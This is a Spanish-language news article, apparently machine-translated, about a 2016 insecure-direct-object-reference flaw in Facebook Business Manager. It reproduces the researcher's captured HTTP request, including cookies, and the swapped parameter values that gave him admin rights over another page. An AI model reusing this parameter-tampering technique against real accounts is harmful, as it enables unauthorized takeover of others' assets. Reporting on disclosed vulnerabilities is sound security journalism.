El investigador de seguridad indio Arun Sureshkumar publico una vulnerabilidad crítica en el Facebook Business Manager que podría ser explotado por atacantes para hackear cualquier página de Facebook.
El Business Manager es el componente que permite a las empresas compartir y controlar el acceso a los activos en Facebook, incluyendo páginas y cuentas de anuncios.
Facebook Business Manager también permite a los administradores compartir el acceso a las páginas y cuentas publicitarias sin ser amigos con compañeros de trabajo en Facebook.
De acuerdo con la definición proporcionada por el proyecto OWASP, los inseguros de referencias a objetos directos se producen cuando una aplicación proporciona acceso directo a los objetos basados en datos facilitados por el usuario. Como resultado de esta vulnerabilidad, un atacante puede pasar por alto de autorización y acceder a recursos en el sistema directamente.
Seun la definción de OSWAP: "La inseguridad de referencias a objetos directos permiten a un atacante eludir autorización y acceso recursos directamente mediante la modificación del valor de un parámetro que se utiliza para apuntar directamente a un objeto. Tales recursos pueden ser entradas de bases de datos pertenecientes a otros usuarios, archivos en el sistema, y más. Esto es causado por el hecho de que la aplicación toma la entrada proporcionada por el usuario y lo utiliza para recuperar un objeto sin realizar suficientes comprobaciones de autorización."
Sureshkumar explota una vulnerabilidad en el Facebook IDOR Gerente de Negocios que le permitió hacerse cargo de cualquier página de Facebook en menos de 10 segundos.
Sureshkumar utilizó su cuenta de Facebook de negocios (ID = 907970555981524) para agregar un socio. Se utiliza como un socio cuenta con una prueba de identificación 991079870975788.
El pirata informático utilizado Burp Suite para capturar la solicitud utilizando Burp Suite, la herramienta le permitió modificar la solicitud.
Por debajo de la solicitud publicada por el hacker:
Host: business.facebook.com
Connection: close
Content-Length: 436
Origin: https://business.facebook.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://business.facebook.com/settings/pages/536195393199075?business_id=907970555981524
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: rc=2; datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB; sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n; lu=gh2GPBnmZY1B1j_7J0Zi3nAA; c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837; fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I; csm=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; p=-2; presence=EDvF3EtimeF1472469215EuserFA21B00771680694A2EstateFDutF1472469215051CEchFDp_5f1B00771680694F7CC; act=1472469233458%2F6
parent_business_id=907970555981524&agency_id=991079870975788&asset_id=536195393199075&role=MANAGER&__user=100000771680694&__a=1&__dyn=aKU-XxaAcoaucCJDzopz8aWKFbGEW8UhrWqw-xG2G4aK2i8zFE8oqCwkoSEvmbgcFV8SmqVUzxeUW4ohAxWdwSDBzovU-eBCy8b48xicx2aGewzwEx2qEN4yECcKbBy9onwFwHCBxungXKdAw&__req=e&__be=-1&__pc=PHASED%3Abrands_pkg&fb_dtsg=AQHoLGh1HUmf%3AAQGT4fDF1-nQ&ttstamp=265817211176711044972851091025865817184521026870494511081&__rev=2530733
¿Qué pasa con la piratería de Facebook?
Cambió el "valor Identificación del activo ' con el de la página de destino de piratear, y también intercambiar el 'parent_business_id' valor con 'agency_id'.También cambió el valor papel de 'administrador'.
parent_business_id = 991079870975788
agency_id = 907970555981524
asset_id = 190313461381022
role = MANAGER
Con este sencillo truco, Sureshkumar demostró que la piratería las páginas de Facebook era posible. Obtuvo derechos de administrador en la página de negocios.
Fecha actualización el 2016-9-18. Fecha publicación el 2016-9-18. Categoría: Hackers. Autor: Oscar olg Mapa del sitio